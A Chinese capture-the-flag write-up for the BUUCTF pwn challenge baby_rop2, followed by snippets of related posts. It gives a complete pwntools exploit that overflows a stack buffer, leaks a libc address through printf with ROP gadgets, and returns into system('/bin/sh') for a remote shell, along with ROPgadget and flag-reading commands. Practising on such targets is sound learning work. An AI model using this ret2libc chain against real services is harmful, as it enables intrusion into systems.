BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
64位,开了nx保护
运行了一下程序
buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)
利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址
然后造成溢出,将返回地址覆盖为system(‘/bin/sh’)
from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node4.buuoj.cn',29343)
elf=ELF('babyrop2')
pop_rdi= 0x400733
pop_rsi_r15=0x400731
format_str=0x400770
printf_plt=elf.plt['printf']
read_got=elf.got['read']
main_plt = elf.sym['main']
payload= 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ")
p.sendline(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc=LibcSearcher('read',read_addr)
libc_base=read_addr-libc.dump('read')
sys_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)
p.interactive()
利用过程
一、 泄露libc基址
由于是64位程序,传参的时候需要用到寄存器
printf函数的原型int printf( const char* format , [argument] … );
举个例子–>print(’%s’,‘hello world’)
这里需要两个参数设置rdi,rsi寄存器
ROPgadget --binary babyrop2 |grep "pop rdi"
rdi_addr=0x400733
ROPgadget --binary babyrop2 |grep "pop rsi"
没有直接设置rsi寄存器的指令,这边后面还跟着一个r15,无所谓了,不用r15,给他随便设置一下就好了,我这边设置的0
pop_rsi=0x400731
首先要设置第一个参数,就是带有类似于%s这种格式的字符串,我这边是使用的程序里自带的语句
format_str=0x400770
接收输出的read函数地址
read_addr = u64(p.recvuntil(’\x7f’)[-6:].ljust(8, ‘\x00’))
接收地址基本上都是7个字节的,7f开头,补全8个字节
得到shell后利用find -name flag 去找到flag文件的位置 或者find -name "flag"
最后读出flag
cat /home/babyrop2/flag
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget相关推荐
- [BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没 ...
- BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...
- BUUCTF(pwn)[HarekazeCTF2019]baby_rop
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- Buuctf(PWN)ciscn_2019_c_1
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函 ...
- [BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
[BUUCTF-pwn]--[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 ...
- BUUCTF pwn wp 76 - 80
cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...
- 持续更新 BUUCTF——PWN(三)
文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...
最新文章
- LINQ to XML 常用操作(转)
- E-mail 标准 SMTP POP3
- React开发(112):不要写多余的select
- jquery flot pie画饼图
- Spring Boot application.properties 常用配置
- (计算机组成原理)第二章数据的表示和运算-第三节3:浮点数加减运算
- ServletContext对象、ServletConfig对象
- 妙啊,小米11保护壳先小米11一步上市了...
- 很多人都爱玩的lol..
- 从基础到分析,聊一聊企业报表平台的建设规划!
- Win7配置SVN详细步骤(服务器和客户端)
- 7大需求分析方法与5大分析过程
- 数量关系-经济利润问题
- day19 482 合唱队形 (线性DP)
- 李德毅:云计算助大数据价值深挖
- Js日期函数-Date方法
- 计算机会计试题原型法的优缺点,《计算机会计学》1..doc
- 谷歌搜索中一些十分有趣的特效现象
- 【Android】关于statusbar的处理
- 什么是可变参数列表?以及可变参数列表是如何实现的?